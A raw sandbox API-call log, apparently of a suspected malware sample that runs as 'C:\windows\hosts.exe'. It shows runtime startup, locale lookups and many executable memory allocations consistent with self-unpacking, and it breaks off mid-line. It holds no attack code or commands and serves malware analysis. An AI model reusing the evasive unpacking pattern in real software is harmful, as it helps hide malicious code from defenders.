0x3a07d0 [0167.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\kEecfMwgj\\Desktop", cchWideChar=1516, lpMultiByteStr=0x3a07d0, cbMultiByte=1516, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\kEecfMwgj\\Desktop", lpUsedDefaultChar=0x0) returned 1516 [0167.924] FreeEnvironmentStringsW (penv=0x10e5800) returned 1 [0167.924] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x0, Size=0x480) returned 0x3a0dc8 [0167.924] GetStartupInfoA (in: lpStartupInfo=0x28f9b8 | out: lpStartupInfo=0x28f9b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\windows\\hosts.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0167.924] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0167.924] GetFileType (hFile=0x0) returned 0x0 [0167.924] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0167.924] GetFileType (hFile=0x0) returned 0x0 [0167.924] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0167.924] GetFileType (hFile=0x0) returned 0x0 [0167.924] SetHandleCount (uNumber=0x20) returned 0x20 [0167.925] GetACP () returned 0x4e4 [0167.925] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x28f9e0 | out: lpCPInfo=0x28f9e0) returned 1 [0167.925] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72a4c528, nSize=0x104 | out: lpFilename="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe")) returned 0x14 [0167.929] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3a07d0 | out: hHeap=0x3a0000) returned 1 [0167.930] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x75a80000 [0167.930] GetProcAddress (hModule=0x75a80000, lpProcName="IsProcessorFeaturePresent") returned 0x75a951ed [0167.930] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0167.930] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x800) returned 0x3a1250 [0167.931] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x98 [0167.931] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x9c [0167.933] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0167.933] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x72a4e6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll")) returned 0x20 [0167.933] GetVersion () returned 0x1db10106 [0167.933] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0167.943] GetUserDefaultLCID () returned 0x409 [0167.943] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0167.943] GetSystemMetrics (nIndex=5) returned 1 [0167.943] GetSystemMetrics (nIndex=6) returned 1 [0167.943] GetSystemMetrics (nIndex=11) returned 32 [0167.943] GetSystemMetrics (nIndex=12) returned 32 [0167.943] GetSystemMetrics (nIndex=34) returned 132 [0167.943] GetSystemMetrics (nIndex=35) returned 38 [0167.943] GetSystemMetrics (nIndex=0) returned 1440 [0167.943] GetSystemMetrics (nIndex=1) returned 900 [0167.944] GetSystemMetrics (nIndex=32) returned 8 [0167.944] GetSystemMetrics (nIndex=33) returned 8 [0167.944] GetSystemMetrics (nIndex=42) returned 0 [0167.944] GetStockObject (i=15) returned 0x188000b [0167.944] GetStockObject (i=7) returned 0x1b00017 [0167.944] GetStockObject (i=6) returned 0x1b00018 [0167.944] GetStockObject (i=8) returned 0x1b00016 [0167.944] GetStockObject (i=4) returned 0x1900011 [0167.944] GetStockObject (i=2) returned 0x1900012 [0167.944] GetStockObject (i=0) returned 0x1900010 [0167.944] GetStockObject (i=5) returned 0x1900015 [0167.944] GetStockObject (i=13) returned 0x18a002e [0167.944] GetDC (hWnd=0x0) returned 0x1f010b3c [0167.945] GetTextExtentPointA (in: hdc=0x1f010b3c, lpString="0", c=1, lpsz=0x28f9dc | out: lpsz=0x28f9dc) returned 1 [0167.949] GetDeviceCaps (hdc=0x1f010b3c, index=14) returned 1 [0167.949] GetDeviceCaps (hdc=0x1f010b3c, index=12) returned 32 [0167.949] GetDeviceCaps (hdc=0x1f010b3c, index=88) returned 96 [0167.949] GetDeviceCaps (hdc=0x1f010b3c, index=90) returned 96 [0167.949] GetDeviceCaps (hdc=0x1f010b3c, index=38) returned 32409 [0167.949] ReleaseDC (hWnd=0x0, hDC=0x1f010b3c) returned 1 [0167.949] HeapCreate (flOptions=0x0, dwInitialSize=0x0, dwMaximumSize=0x0) returned 0xe50000 [0168.159] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e7d0 | out: ppMalloc=0x72a4e7d0*=0x76da66bc) returned 0x0 [0168.159] GetCurrentThreadId () returned 0xa9c [0170.965] GetCommandLineA () returned="C:\\windows\\hosts.exe " [0170.966] GetStartupInfoA (in: lpStartupInfo=0x28fe8c | out: lpStartupInfo=0x28fe8c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\windows\\hosts.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0170.966] GetVersion () returned 0x1db10106 [0170.966] GetVersion () returned 0x1db10106 [0170.966] GetCurrentThreadId () returned 0xa9c [0170.966] GetModuleFileNameA (in: hModule=0x42d000, lpFilename=0x28f988, nSize=0x105 | out: lpFilename="." (normalized: "c:\\users\\keecfmwgj\\desktop\\.")) returned 0x0 [0170.966] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f863, nSize=0x105 | out: lpFilename="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe")) returned 0x14 [0170.966] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0170.967] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0170.967] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x28f978 | out: phkResult=0x28f978*=0x0) returned 0x2 [0170.967] lstrcpynA (in: lpString1=0x28f863, lpString2=".", iMaxLength=261 | out: lpString1=".") returned="." [0170.967] GetThreadLocale () returned 0x409 [0170.968] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x28f973, cchData=5 | out: lpLCData="ENU") returned 4 [0170.968] lstrlenA (lpString=".") returned 1 [0170.968] LoadStringA (in: hInstance=0x42d000, uID=0xffd6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid NULL variant operation") returned 0x1e [0170.969] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x10e7650 [0170.969] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0xfa0000 [0170.969] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x10e8650 [0170.969] VirtualAlloc (lpAddress=0xfa0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xfa0000 [0170.970] LoadStringA (in: hInstance=0x42d000, uID=0xffd5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0170.970] LoadStringA (in: hInstance=0x42d000, uID=0xffd3, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant or safe array is locked") returned 0x1f [0170.970] LoadStringA (in: hInstance=0x42d000, uID=0xffd4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0170.970] LoadStringA (in: hInstance=0x42d000, uID=0xffef, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Read") returned 0x4 [0170.970] LoadStringA (in: hInstance=0x42d000, uID=0xffd2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0170.970] LoadStringA (in: hInstance=0x42d000, uID=0xffee, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0170.971] LoadStringA (in: hInstance=0x42d000, uID=0xffeb, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Application Error") returned 0x11 [0170.971] LoadStringA (in: hInstance=0x42d000, uID=0xffd1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0170.971] LoadStringA (in: hInstance=0x42d000, uID=0xffd0, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Write") returned 0x5 [0170.971] LoadStringA (in: hInstance=0x42d000, uID=0xffe4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0170.971] LoadStringA (in: hInstance=0x42d000, uID=0xffe5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Access violation at address %p. %s of address %p") returned 0x30 [0170.971] LoadStringA (in: hInstance=0x42d000, uID=0xffe6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0170.971] LoadStringA (in: hInstance=0x42d000, uID=0xffe3, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0170.971] LoadStringA (in: hInstance=0x42d000, uID=0xffe1, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0170.971] LoadStringA (in: hInstance=0x42d000, uID=0xffff, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0170.971] LoadStringA (in: hInstance=0x42d000, uID=0xfffe, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0170.971] LoadStringA (in: hInstance=0x42d000, uID=0xfffd, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0170.971] LoadStringA (in: hInstance=0x42d000, uID=0xfffc, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0170.971] LoadStringA (in: hInstance=0x42d000, uID=0xfffb, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0170.971] LoadStringA (in: hInstance=0x42d000, uID=0xfffa, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0170.971] LoadStringA (in: hInstance=0x42d000, uID=0xfff9, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0170.972] LoadStringA (in: hInstance=0x42d000, uID=0xfff8, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0170.972] LoadStringA (in: hInstance=0x42d000, uID=0xfff7, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0170.972] LoadStringA (in: hInstance=0x42d000, uID=0xfff6, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0170.972] LoadStringA (in: hInstance=0x42d000, uID=0xfff5, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0170.972] LoadStringA (in: hInstance=0x42d000, uID=0xfff4, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="I/O error %d") returned 0xc [0170.972] LoadStringA (in: hInstance=0x42d000, uID=0xfff3, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0170.972] LoadStringA (in: hInstance=0x42d000, uID=0xfff2, lpBuffer=0x28faac, cchBufferMax=1024 | out: lpBuffer="Invalid argument to date encode") returned 0x1f [0170.972] LoadStringA (in: hInstance=0x42d000, uID=0xfff0, lpBuffer=0x28fa98, cchBufferMax=1024 | out: lpBuffer="'%s' is not a valid integer value") returned 0x21 [0170.972] LoadStringA (in: hInstance=0x42d000, uID=0xffe0, lpBuffer=0x28fa98, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0170.972] GetVersionExA (in: lpVersionInformation=0x28fe30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x77a90362, dwMinorVersion=0x77a8e192, dwBuildNumber=0x3, dwPlatformId=0x764fd6a6, szCSDVersion="\x13") | out: lpVersionInformation=0x28fe30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0170.972] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0170.973] GetProcAddress (hModule=0x75a80000, lpProcName="GetDiskFreeSpaceExA") returned 0x75b148ef [0170.973] GetThreadLocale () returned 0x409 [0170.973] GetThreadLocale () returned 0x409 [0170.973] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jan") returned 4 [0170.973] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x28fd08, cchData=256 | out: lpLCData="January") returned 8 [0170.973] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Feb") returned 4 [0170.973] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x28fd08, cchData=256 | out: lpLCData="February") returned 9 [0170.973] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Mar") returned 4 [0170.973] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="March") returned 6 [0170.973] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Apr") returned 4 [0170.973] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="April") returned 6 [0170.973] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x28fd08, cchData=256 | out: lpLCData="May") returned 4 [0170.973] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="May") returned 4 [0170.974] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jun") returned 4 [0170.974] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="June") returned 5 [0170.974] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Jul") returned 4 [0170.974] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="July") returned 5 [0170.974] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Aug") returned 4 [0170.974] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="August") returned 7 [0170.974] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sep") returned 4 [0170.974] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x28fd08, cchData=256 | out: lpLCData="September") returned 10 [0170.974] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Oct") returned 4 [0170.974] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x28fd08, cchData=256 | out: lpLCData="October") returned 8 [0170.974] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Nov") returned 4 [0170.974] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x28fd08, cchData=256 | out: lpLCData="November") returned 9 [0170.974] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Dec") returned 4 [0170.974] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x28fd08, cchData=256 | out: lpLCData="December") returned 9 [0170.975] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sun") returned 4 [0170.975] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sunday") returned 7 [0170.975] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Mon") returned 4 [0170.975] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Monday") returned 7 [0170.975] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Tue") returned 4 [0170.975] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Tuesday") returned 8 [0170.975] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Wed") returned 4 [0170.975] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Wednesday") returned 10 [0170.975] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Thu") returned 4 [0170.975] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Thursday") returned 9 [0170.975] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Fri") returned 4 [0170.975] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Friday") returned 7 [0170.975] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Sat") returned 4 [0170.975] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x28fd08, cchData=256 | out: lpLCData="Saturday") returned 9 [0170.976] GetThreadLocale () returned 0x409 [0170.976] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x28fd64, cchData=256 | out: lpLCData="$") returned 2 [0170.976] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0170.976] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0170.976] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=",") returned 2 [0170.976] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=".") returned 2 [0170.982] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x28fd64, cchData=256 | out: lpLCData="2") returned 2 [0170.982] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x28fe5c, cchData=2 | out: lpLCData="/") returned 2 [0170.982] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x28fd64, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0170.982] GetThreadLocale () returned 0x409 [0170.982] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x28fd30, cchData=256 | out: lpLCData="1") returned 2 [0170.982] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x28fd64, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0170.982] GetThreadLocale () returned 0x409 [0170.983] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x28fd30, cchData=256 | out: lpLCData="1") returned 2 [0170.983] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=":") returned 2 [0170.983] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x28fd64, cchData=256 | out: lpLCData="AM") returned 3 [0170.983] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x28fd64, cchData=256 | out: lpLCData="PM") returned 3 [0170.983] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0170.983] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0170.983] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x28fd64, cchData=256 | out: lpLCData="0") returned 2 [0170.983] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x28fe5c, cchData=2 | out: lpLCData=",") returned 2 [0170.983] HeapCreate (flOptions=0x0, dwInitialSize=0x88000, dwMaximumSize=0x88000) returned 0x3170000 [0170.988] RtlAllocateHeap (HeapHandle=0x3170000, Flags=0x0, Size=0x10000) returned 0x3170590 [0170.988] RtlAllocateHeap (HeapHandle=0x3170000, Flags=0x0, Size=0x10000) returned 0x3180598 [0170.988] RtlAllocateHeap (HeapHandle=0x3170000, Flags=0x0, Size=0x10000) returned 0x31905a0 [0170.988] RtlAllocateHeap (HeapHandle=0x3170000, Flags=0x0, Size=0x10000) returned 0x31a05a8 [0170.988] RtlAllocateHeap (HeapHandle=0x3170000, Flags=0x0, Size=0x10000) returned 0x31b05b0 [0170.989] RtlAllocateHeap (HeapHandle=0x3170000, Flags=0x0, Size=0x10000) returned 0x31c05b8 [0170.989] RtlAllocateHeap (HeapHandle=0x3170000, Flags=0x0, Size=0x10000) returned 0x31d05c0 [0170.989] RtlAllocateHeap (HeapHandle=0x3170000, Flags=0x0, Size=0x10000) returned 0x31e05c8 [0170.989] VirtualAlloc (lpAddress=0xfa4000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x40) returned 0xfa4000 [0170.991] VirtualAlloc (lpAddress=0xfac000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x40) returned 0xfac000 [0171.002] VirtualAlloc (lpAddress=0xfcc000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0xfcc000 [0171.003] VirtualAlloc (lpAddress=0xfd0000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x40) returned 0xfd0000 [0171.017] VirtualAlloc (lpAddress=0x1000000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1000000 [0171.018] VirtualAlloc (lpAddress=0x1004000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x40) returned 0x1004000 [0171.020] VirtualAlloc (lpAddress=0x100c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x100c000 [0171.021] VirtualAlloc (lpAddress=0x1010000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1010000 [0171.022] VirtualAlloc (lpAddress=0x1014000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1014000 [0171.023] VirtualAlloc (lpAddress=0x1018000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1018000 [0171.028] VirtualAlloc (lpAddress=0x101c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x101c000 [0171.029] VirtualAlloc (lpAddress=0x1020000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1020000 [0171.030] VirtualAlloc (lpAddress=0x1024000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1024000 [0171.031] VirtualAlloc (lpAddress=0x1028000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1028000 [0171.032] VirtualAlloc (lpAddress=0x102c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x102c000 [0171.033] VirtualAlloc (lpAddress=0x1030000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1030000 [0171.034] VirtualAlloc (lpAddress=0x1034000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1034000 [0171.034] VirtualAlloc (lpAddress=0x1038000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1038000 [0171.035] VirtualAlloc (lpAddress=0x103c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x103c000 [0171.036] VirtualAlloc (lpAddress=0x1040000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1040000 [0171.037] VirtualAlloc (lpAddress=0x1044000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1044000 [0171.038] VirtualAlloc (lpAddress=0x1048000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1048000 [0171.045] VirtualAlloc (lpAddress=0x104c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x104c000 [0171.046] VirtualAlloc (lpAddress=0x1050000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1050000 [0171.047] VirtualAlloc (lpAddress=0x1054000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1054000 [0171.048] VirtualAlloc (lpAddress=0x1058000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1058000 [0171.049] VirtualAlloc (lpAddress=0x105c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x105c000 [0171.050] VirtualAlloc (lpAddress=0x1060000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1060000 [0171.050] VirtualAlloc (lpAddress=0x1064000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1064000 [0171.051] VirtualAlloc (lpAddress=0x1068000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1068000 [0171.052] VirtualAlloc (lpAddress=0x106c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x106c000 [0171.053] VirtualAlloc (lpAddress=0x1070000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1070000 [0171.054] VirtualAlloc (lpAddress=0x1074000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1074000 [0171.061] VirtualAlloc (lpAddress=0x1078000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1078000 [0171.062] VirtualAlloc (lpAddress=0x107c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x107c000 [0171.062] VirtualAlloc (lpAddress=0x1080000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1080000 [0171.063] VirtualAlloc (lpAddress=0x1084000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1084000 [0171.064] VirtualAlloc (lpAddress=0x1088000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1088000 [0171.065] VirtualAlloc (lpAddress=0x108c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x108c000 [0171.066] VirtualAlloc (lpAddress=0x1090000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1090000 [0171.067] VirtualAlloc (lpAddress=0x1094000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1094000 [0171.068] VirtualAlloc (lpAddress=0x1098000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x1098000 [0171.069] VirtualAlloc (lpAddress=0x109c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x109c000 [0171.127] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x32e0000 [0171.128] VirtualAlloc (lpAddress=0x32e0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x32e0000 [0171.129] VirtualAlloc (lpAddress=0x32e4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x32e4000 [0171.130] VirtualAlloc (lpAddress=0x32e8000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x32e8000 [0171.130] VirtualAlloc (lpAddress=0x32ec000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x32ec000 [0171.131] VirtualAlloc (lpAddress=0x32f0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x32f0000 [0171.137] VirtualAlloc (lpAddress=0x32f4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x32f4000 [0171.138] VirtualAlloc (lpAddress=0x32f8000, dwSize=0x4000, flAllocationType=0x1000, 